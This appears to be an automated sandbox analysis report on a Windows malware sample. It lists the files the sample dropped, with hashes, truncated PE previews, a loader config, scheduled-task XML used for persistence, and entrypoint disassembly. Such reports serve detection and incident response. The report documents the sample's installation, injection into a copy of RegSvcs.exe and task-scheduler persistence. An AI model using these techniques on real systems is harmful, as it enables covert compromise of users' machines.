              Preview: ..;.....;.I.6e..O.6/y..ZK..p.....-w..`J.1B^^.d.pAx.gc.g..cq.l..N.......F.......nN..\.......#.c.s..M(T...........NWZ....p.u.2.1.6.6.6.c.Y.8.7.3.G.0.q.1.0.3.........9;.k*....N*.X..>`..aJ........BF.....L..&.mL._.8.H._....9.@.Z...O.J....;. U..g..!.....8./c.].s.....T...r..h../.3./.S.....-1...n.$|......h..$.......v/d../..9.5I>.!....{Y=.*..7..=<}..7gB..9.....a*..B]...d.....C.j....h&.U+...w......2.s.0.7.P.5.P.e.5.2.Z.9.0.2.c.6.e.L.8.f.A.8.v.H.6.P.p.4.7.7.E.5.v.G.X.1.j.7.3.3.2.1.V.1.o.u.8.5.Q.....6.z.n.g.9.1.3.I.D.E.4.2.8.5.Z.6.K.e.B.6.9.n.p.J.2.R.6.2.I.1.0.f.u.i.Y.D.2.8.g.8.r.7.0.7.5.7.....B.p.8.I.c.9.L.i.7.p.3.F.b.6.a.2.Y.....\.....]......Q...Ws...4.DJ.+..B.Fl.V.].>#..f........E....C.........V3....b........Y......D...........}J!A&.X..l...a....C./....t..%.])..$.Q,..z5..`.^......q.F.u...5...*.....c.Z.6.l.0.3.6.7.3.1.N.x.5.0.1.4.L.p.k.j.3.......A......+.A.O7.w.J.0..[d.wX.....-:W.C..PD....U....B.."....F^.G.....^P..!...(..!.C.8.g".&.M.h.*..h...Qx.g3KX.G..............
              C:\Users\user\31956653\tlogpwsu.xml
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):506
              Entropy (8bit):5.465090732929896
              Encrypted:false
              SSDEEP:
              MD5:7ECA9413CD44177EA404E1F3549D303B
              SHA1:08AB492A0D375AC8DEBDA33A750E9703B2FAC1A5
              SHA-256:434D3D0A388D45DFD31F620784FE8224A75088A3F5130B78966196F5854CCF81
              SHA-512:013CFD2B36669F55A268C146742E3CFE3F430315F44F848EB78D071B4ECA36A0B99A56FDD5AAB116D48E65DE770C5AC5BF95CC2F39792E8669541FD82D618BE4
              Malicious:false
              Reputation:unknown
              Preview: 8435r0Dx9kd4f90974GmL4EnbsVNEg6zmyh9e2Uaph0er3Yp14PzBMsVC94aKG407S012IC3tm8..e01Jf8A40ZwUSF4lLuQe004O31f4u657z14K4c73E857gV8dIKKR4U70O8Q8F019O42707951N4q9a160FTig69e4yf37458QNR213878YP7Y5..816M94hi55WB248b90b81Hl71QlRe9lf32t8vn7983675zKCj33m564Jzo1rR3n41aRgO421OHUi54u46I0F931367Kf85mRh7993kthxAZZL0JUeT191OoP7H5Tp89p8Y7luT6EGHF1252215q2bl74gSF778f1b1j9W4..w4f38g796792687Mt648465M75V15742i5t..uxJ0Z636DSy0V2bsgru..m0p55D4uc32UYMHfO91L7j7a123658X2l7257ok04ad50y55n5L1e66..4634H5E3jxa3p3RNKIxW5676DKI128En..
              C:\Users\user\31956653\ufrxn.msc
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):531
              Entropy (8bit):5.502780045827598
              Encrypted:false
              SSDEEP:
              MD5:6074D095111C359480ACB96C9231F66F
              SHA1:088A5DA089F1BD720B0F8E92A2D7A68F0488AE56
              SHA-256:3A413CDE1881BD4B2AEDE76034BAA94A00D40B6C7BDA18577636DCCBB7746CBA
              SHA-512:3E7C1ABFCE67624A2B25CE4BB95429E70C4408CBA9BF92828F12A5B42F404BCFF6BA416A98D3AE30C2F64348946BA46560BC06B5F2B1B40A92007DF3B195A634
              Malicious:false
              Reputation:unknown
              Preview: 9069ka84619hQ4X1u61wbX1Ae3f2i9cWjUhIP759085HS93c8mQB7y4vb86Hh0G5m1yv6Br04215I38An0J1g74JyI4y03IWH3wZWH6RNnyCv94754..vV621X635k182g89nrT3T1..6960..0cNC93u78p7DvM408fp30W6186mMYHYlmb1d6GJZx9W5353ev8o578W98w1zNG9f1b9ds2Oz6..B254QI2031S1nJ0WZn21y488CmAJCl009S5Cdl7xEu87heL0b46A7951E567c8FbCt0126z7qLpMxH6ofmB08Ka4..2896M652b3ov465PIW3Z0I8G861187..36xU3t0jp4862nJ2s6Z569549P2e245p51m2QPOc35v29ETw8H23xVt8U7321RSlw4S60h1N8tGG0VIBQ..MgQR35V89O56fj2886l3Ipc706s1rK37q42E01g680fXgHAj2XIo6Vs3t3506a323cpUx9wgRzFE10K2w3963n1T8vFjZ30Cz9j6pZq..
              C:\Users\user\31956653\vdpstja.bin
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):654
              Entropy (8bit):5.466159936178476
              Encrypted:false
              SSDEEP:
              MD5:1FC0F96F57264D51546177D2A6697CAF
              SHA1:0056139558090B064B303817343B3917DAEC225B
              SHA-256:32BB7294265BABD847D37D6D45F4DFFB60D3A9E12EA684417D2911A4380B8AA1
              SHA-512:87215809D30044A9D74E9B557DFDC1B3BC62DECA7C9B80BD0741C4849C951079C1FE2C525C7E2A9F70F2EB329BEA5B78CF2D6A5FA8425A64E075AFF88199D094
              Malicious:false
              Reputation:unknown
              Preview: 5M1Fej13so8K1ph807a6rU6go3991Kn1us5Lt69933e9XF2tM8Z..168lR7162pb5o8HZ55b94z31d663FO45q752Mg854qruZ9347T779..1o6275966u41M22Zw1H664j14KqC3K79tG53m4cSd218b2IbZ5U7o9755O2H2S1NP7620..5aW42Ci642D319UrW0pg3ro..16k028fLX2556n965HF8190sW233EML51U881Y9N69K575995271FKLOMB1KH6JoX18fJIX662X6C271jS5455e880D842gU..7V72MgW51Jw9Ox6wAC486g664c2u338n0xRxEk2Mu3whdM2x5DDAMqGGD1zTZ1IJSyW117r88oG07Me56uu5zO4v7CuvEA95pg6oAs613GsG61Y2zF8b86y6K..04h3xk567Y8GZcWIArS8795n6..N2Gzo7fg6720..8TbHsG4fRP6956D376cE1MGn29598858059aH3avA78y8RpJ285w13qyV408zT79qtv3j5619Ayyr23iuE6SX8l8pYphS66IZA2yC0fnD7H0T9aw207a84b0eR1278hR643P3VD5DS1FFv0PInq1852l4Q5fM04B05i87WV5B21rZqe15P24S7BV59..
              C:\Users\user\31956653\vmwepitk.ico
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):518
              Entropy (8bit):5.446951342718582
              Encrypted:false
              SSDEEP:
              MD5:3BC051ABDDADF20F44239A3F4D7729A2
              SHA1:85907AB13C191D6EA676205B2013FB4B2D76D700
              SHA-256:1A458064D0C494B97DBA9BA3B3B815D1E4457672AD982D234F4CCDE1A834087F
              SHA-512:939DCFA24EB6A42412BA2D2DA4158543CEC96CCDF010A09C739684805464604805AB6B145C573BDF3C0591D4CDBFB260363632AED9383AB17DF028DAD81614CF
              Malicious:false
              Reputation:unknown
              Preview: h4y74215M7N98ioB3K66CwgPHQ7n8bM40Q9w09m75996T8S5l93197feabk86Asj60v1b03in68H568OJJaX82305t00MscLTi6I2y903578V6E44v513liRSMG6j5P..65Uii857pu51gT292r6571R2s3pM656h4NH4eZX3461cF72c88c5X32s3baF6SAI8Z9tm9Ht9UXXO97Sq7gv4g274985boZ464H0399S5Ft8BX7qY5xm1C..Ix682Z99m9G..17y9678VM0R4fbzO0yii35j84ZHrz7QGq6800Pu28krPP2DW06329cXj5z4HnG10u5R7Eb65..me741b7t39VAN6rJ8cU8T8Y1g979686721m6t0Rh3AI733KNxXwr8328ZJaWzX67202y456zAp5diV284725l6qs0134n5fT9c3F16Ik0Iz7PQ65IvX..5V6647SD6I7627Y3l2G83465rcO99bKG1s5H37BkKe4T8210K00x65YJE7473F3..
              C:\Users\user\31956653\vxnslrtcv.docx
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):595
              Entropy (8bit):5.498200602093174
              Encrypted:false
              SSDEEP:
              MD5:CE89B449E0BF13583FCF623DC39E4A3A
              SHA1:5AF6F11E0E2D583FDD0B8EF96BDB1AB5B8516FD7
              SHA-256:7D79C01E5A34AE5BB59F40F23BF1545EFD01760803551FFA744769FE9098FF34
              SHA-512:D99542FEFA2C5DE4EA1F0B290B462BE35E7BF161FB77F751E8FB25E5B95B74CFE01C72FC95EF08909974EF9053CE028FBCDEBED0DA4C123BF29D09C034FFC025
              Malicious:false
              Reputation:unknown
              Preview: lJ1l125B03rJ9T7is4bPP6Q6XMi248S54V58iX4j3Y3C01N0Lec371w70P6sgeyh2e03775B9D8r63G6Y35520d807b5cW55732Vk24N833..C2E7vI7390701H..wG9495x78A3uV43h3NI..o4NG3y1166O06iAmx9l0g..Mx8FsQ088H5E0qlim4Ja100e9h3YKh5j798D4Xsp2se961Z4e0CdY25n1R9OuV3ua062tQ6K7o31T25Di772Q8W8294InYh77jKIXZwx31464j98h55L5w7wj..dEU7698St7YOU5Kh5H4d05765jV8G9049nX803ry7U2fNN074K960HKJ1722E7vOD03Od5x45uUh6Pq..0lVn8Q169569I33984TH341t8r26UjzH5N828Kt1pqK665y2b3H4M43a29QP42YW3yy8zn6LHR1UQYJ58Qd95qKPM94LQXa4887XRP..32PapR7p7T7w559B64fb0k3C4Cu8Bm2xK1424E9108F0p79aL2Z6sUfbEhF9C24GIWR6QIRT19u4Sth9758c6r356Xy3s35mIF6b7T5ns2Z0C7X9pV38..
              C:\Users\user\31956653\whgh.dll
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):563
              Entropy (8bit):5.410246118862809
              Encrypted:false
              SSDEEP:
              MD5:F9DCC92A013B1A4B704BD50130EDA877
              SHA1:629A854A96C2020E0C07D9EFF31B9F95BBB5DC6B
              SHA-256:C1E1AD8AF0A12CD3AAA7C9FB348FE0A5B98106C3044F2338CD3BC0830187B98F
              SHA-512:196773F45D02654198D0FBD22C384358B13C3536ADDA41CFB2A4D0B1B0664BC202BFA32F03F3AB6D894E931FF4B74CD58DF53197781C0BE6CFB1A53F141A61D1
              Malicious:false
              Reputation:unknown
              Preview: d38t2lI882p3m6286AT7epu1o3WO1vfiS66f3X0JITm6k40TSPr995wGR4U18E53235Q0GdW261e8q3MFR7X901i15Z910..935120c20f1NCeTP130YI58f0N09K693eD5y2Y37X33N77h8Bx5n3U57XGNY493Ap703S6CFcS1Yeb59vEo27..a9w5D1x9Wk878ymu5P65Mha37Z6VS07l6D4Y13rQ458245jlvCfN38rGTjgsunmU8GlL89eH9495vCq6cCK7kkl93r64e9vL03a60eQ4ik136wf05L3Ce27893z8K4jn5Mo9G0I4L71y9..10J9k71LwIE04357715oI4nH..938CB3n8uy95H532el5962Gc6a500G32qC25P319048a50Piu5957Qdz6ue861z23425OcG8fMYi9b4bTJGk9z5445n7fte51j3392057fde2th7053E8o2s73Lh5K0d86557..l218O9mil006cIv3C4j84K327wD6253u8EX7Kn0c7i7563o95V72L0BUKf94S7UA36t368cTq1..
              C:\Users\user\31956653\xdotxo.docx
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):517
              Entropy (8bit):5.466351604074262
              Encrypted:false
              SSDEEP:
              MD5:49E7CBE3D9F1AC75C33159FFD823EB1E
              SHA1:CE297374AC9139763C4F42EDFCAA24148267681B
              SHA-256:323B5E48259C5E894A23BE28A5DEFCEA8A9DE7C09CAB11CD471B73A016408441
              SHA-512:68D14282E48C130284E2AF41E69BB99C0548CA2B93675FE450E6BAAC1EA1719C94F1E95FF78447FF5B4FB4E7C5C5E2867D9641F52C1465A2B7C9B9A18424BC39
              Malicious:false
              Reputation:unknown
              Preview: 35mc101735L06Rh3A08poM8Tt1Q4n4g72k8j793c9248rhp556H0dAU26N0qxC8C4c8AoZ97Gvg5PHc99Khu9EK9wVa08Uh8K288LBt9721DB49R87qKAS13vB94Td9YA..6ooCO01A5h7m11r508S7WW07..1439X2s05Awv3X7sB0Te34S737EP6785sY329H..18q80N9de5G5I79mBZ1Po2701U2N5DLnR38KlN0Jq40X52AJr3S3cAEy8k0w758R0TcQ361gO57KH45V760o..2422MkH58CZbNBv7DKo4W299NWILKg47oR28A1Z8yL20..L2AHdHWT82KA3P31RiBeN28093SF727Y4H9CX475Mt13dE3nms2A5x..S3nENqOGVd7Gl290177o69Q019XUl9L415y2jmag389V6kis3WQlZ883T3kG625H5669o9VtUGY8s8q7s700Dx38r5Sv84H079GL3f09C0nYp6X24G6172C3b2C7M0LF34..
              C:\Users\user\31956653\xmjk.pif
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):776432
              Entropy (8bit):6.353910854155555
              Encrypted:false
              SSDEEP:
              MD5:279DAE7236F5F2488A4BACDE6027F730
              SHA1:29A012E5259739F24480CEDFD6D5F2D860CFCDB3
              SHA-256:415850F2706681A6D80708FCA8AC18DCF97E58B8F3FDC7BC4B558AB15FC0A03F
              SHA-512:B81276FC4D915A9721DAE15AA064781A1DBA665FF4864CCBDF624E8049C1B3C12A2B374F11CFFCF6E4A5217766836EDBC5F2376FFA8765F9070CBD87D7AE2FE8
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Metadefender, Detection: 37%, Browse
              • Antivirus: ReversingLabs, Detection: 56%
              Reputation:unknown
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O.........."..................d....... ....@..........................0......Jg....@...@.......@.........................T................................c................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................R..............@..@.reloc...u.......v...D..............@..B................................................................................................................................................................................................................................................................................................................
              C:\Users\user\31956653\xowesno.icm
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):630
              Entropy (8bit):5.469657756184613
              Encrypted:false
              SSDEEP:
              MD5:82A2AA44DA9BE298E7CA6F9B1BE37489
              SHA1:951CBE31A533D075F9981148061A5E39DF4D8ECF
              SHA-256:D1C0DB29168FBB45315E6897FD03B91C7B7D452C8B363BA17BA7D723A5C858EA
              SHA-512:9A1FB6140BF8B45197F295B2EAD678D02F957660A7DF4CE1F0F30E41EC07AE43331ADA081F0EDCAED1AA62AE8EE4CEB38ECE90A323432DD982467F3152D00D3F
              Malicious:false
              Reputation:unknown
              Preview: 6P35vaP7iS2cbly5tn56D78h6983t7I7531dSXgRf4w21070Po10FjxmL7FS9m5X96JXw1M5515l84Q1vVya9283o12826077FQX13f..791R191QGC73ef6941W09io8pg372fJ4p5YoNfM000E1WGjn24V63N80gm851ZpYoB153W3E6407r2d7606362301wU6qH213Y..110T8j870q1B1xm3YU6a0141c2Kg873ZpUE4kdw0tKR465dH92W6..9kfd41F5Vqf00504914O900484NvD184u9K34x57VODzJZ4216X5a4IZ964645332IV6j3QJgm0Rc1hM7c9O2g93V9p60sfIP1dZ0I7XgH031qgKUYA4tGn45W6bF0Lb274K3l7Z8..r1e840v3fu0N03v565VB26Mdo31OpX5r47cA01f68sAkm7W9tRA5c178I97F1u96zd5n1GY590B2031308Z8zClMP7..34K14827mq2QMBR3Q4v8MYHz0Sp1K05vIWR3573E99xnFUkyz2wrt1R830707csLT1abklg22eJqZ466U74L7fH7cL2bftMG66o214Z5Cs3S17c46A46nXYL67w5Pa1PG83Fz7702a..
              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
              C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Process:C:\Users\user\31956653\xmjk.pif
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:true
              Antivirus:
              • Antivirus: Metadefender, Detection: 0%, Browse
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
              C:\Users\user\AppData\Local\Temp\tmp7982.tmp
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1308
              Entropy (8bit):5.107159514403738
              Encrypted:false
              SSDEEP:
              MD5:211C08A48B92E556A855FB90EE4B0942
              SHA1:4E3ECFBEA0CCA0EE2743C0E23ED3FC79EB2E282A
              SHA-256:21F529F720EE77AD03AFD3CFA4CE04EBAF243C3E752F14C268529665CA936146
              SHA-512:B65C55C05249DFFFD0B52DF66DBA692CE21B6D447DEA43E93DACE718E40ABAC069A6BD2DC4CF0BC3F979A327BB7896BE6A3A36540916A33E0CDA8B974E2955F1
              Malicious:true
              Reputation:unknown
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1310
              Entropy (8bit):5.109425792877704
              Encrypted:false
              SSDEEP:
              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
              Malicious:false
              Reputation:unknown
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:Non-ISO extended-ASCII text, with no line terminators
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:
              MD5:AC8BC54500409DC48009947C7192C04F
              SHA1:6929BE6CFA0169258B2870A14CA8E7F80CC3183B
              SHA-256:96A15B672AA0CA305E924C7EF126ED25863728FA7778B4558D3B29003DE0CD32
              SHA-512:31D6F483C75A42A4782386C00AABEFFC6A138E5C06ACAC1A63FA1CBA0507CB1A09627BC0B94C96162055160B6200BCAC49EF53BF092B7F3606238D7A2CA9CD13
              Malicious:true
              Reputation:unknown
              Preview: oc.R...H
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):45
              Entropy (8bit):4.4112044189276585
              Encrypted:false
              SSDEEP:
              MD5:4879007AC97C3DF41896D937852ABBE7
              SHA1:05A8C8638A4C8157216EF4AE24B43D3A4E750F00
              SHA-256:18B03E2D9F5F5E7E26686848D71049AC56D06500A2AB420A3A01CA0ED6C7AD18
              SHA-512:03C80EC22591301B32EB0310A188B1C4C24DC16BF9E2E25B22A95AA6E36E9B7002196B13A522F36D9AC64C38A98D6BA06C3387DBBE7CB3319E45BC43359A6C43
              Malicious:false
              Reputation:unknown
              Preview: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              C:\Users\user\temp\eblsq.ppt
              Process:C:\Users\user\31956653\xmjk.pif
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):80
              Entropy (8bit):4.988137789834391
              Encrypted:false
              SSDEEP:
              MD5:FE5D5426B0972408E1424ABC0F49F71B
              SHA1:A994F74A16522DAF1DDC270605C1B88979ABBCAD
              SHA-256:35A80327293D6268AA1C1FA881C3E84AF272B297672458C2CB3CACC41AFA691E
              SHA-512:2EB9191B629B025775F4CDA31F64FDC99A26E7A98AAAA94EC1C956AF719CE067A5545A0B0E37E178BDAD87734924C130B521EAB2E8FB23DC1952334660ACB6DB
              Malicious:false
              Reputation:unknown
              Preview: [S3tt!ng]..stpth=%userprofile%..Key=Chrome..Dir3ctory=31956653..ExE_c=xmjk.pif..
              \Device\ConDrv
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF, LF line terminators
              Category:dropped
              Size (bytes):215
              Entropy (8bit):4.911407397013505
              Encrypted:false
              SSDEEP:
              MD5:623152A30E4F18810EB8E046163DB399
              SHA1:5D640A976A0544E2DDA22E9DF362F455A05CFF2A
              SHA-256:4CA51BAF6F994B93FE9E1FDA754A4AE74277360C750C04B630DA3DEC33E65FEA
              SHA-512:1AD53476A05769502FF0BCA9E042273237804B63873B0D5E0613936B91766A444FCA600FD68AFB1EF2EA2973242CF1A0FF617522D719F2FA63DF074E118F370B
              Malicious:false
              Reputation:unknown
              Preview: Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved......The following installation error occurred:..1: Assembly not found: '0'...

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.836743207281609
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:dAkJsQr7A9.exe
              File size:1103745
              MD5:b115228fe5e180f505c081aa829c1a86
              SHA1:c242c6a90ae569e55ed6acdb5c765244f623b9b6
              SHA256:a64c1b956bb79c5cfec594165a4ba37e9f695f8f83ec2b7bc2729d19c2598cd5
              SHA512:c7b49a9fdbd08e0eb219758c8d8b44bd0b43663d66053bc52068edfa6efaf70a809218995dda2eec5e2414e2dc96385236c991300293b617d1da022f02593620
              SSDEEP:24576:rAOcZEh2G8ydrzUcNV53O9QblBWTq6ai0bagi7vzJL:tBNlw2x+Qbl8Tq6d4a5vN
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

              File Icon

              Icon Hash:b491b4ecd336fb5b

              Static PE Info

              General

              Entrypoint:0x41e1f9
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x5E7C7DC7 [Thu Mar 26 10:02:47 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

              Entrypoint Preview

              Instruction
              call 00007F8C409F645Fh
              jmp 00007F8C409F5E53h
              cmp ecx, dword ptr [0043D668h]
              jne 00007F8C409F5FC5h
              ret
              jmp 00007F8C409F65D5h
              ret
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 00433068h
              mov dword ptr [ecx], 00434284h
              ret
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F8C409E93D1h
              mov dword ptr [esi], 00434290h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 00434298h
              mov dword ptr [ecx], 00434290h
              ret
              lea eax, dword ptr [ecx+04h]
              mov dword ptr [ecx], 00434278h
              push eax
              call 00007F8C409F916Dh
              pop ecx
              ret
              push ebp
              mov ebp, esp
              push esi
              mov esi, ecx
              lea eax, dword ptr [esi+04h]
              mov dword ptr [esi], 00434278h
              push eax
              call 00007F8C409F9156h
              test byte ptr [ebp+08h], 00000001h
              pop ecx
              je 00007F8C409F5FCCh
              push 0000000Ch
              push esi
              call 00007F8C409F558Fh
              pop ecx
              pop ecx
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F8C409F5F2Eh
              push 0043A410h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F8C409F8855h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch

              Rich Headers

              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [EXP] VS2015 UPD3.1 build 24215
              • [LNK] VS2015 UPD3.1 build 24215
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2015 UPD3.1 build 24215
              • [RES] VS2015 UPD3 build 24213

              Data Directories

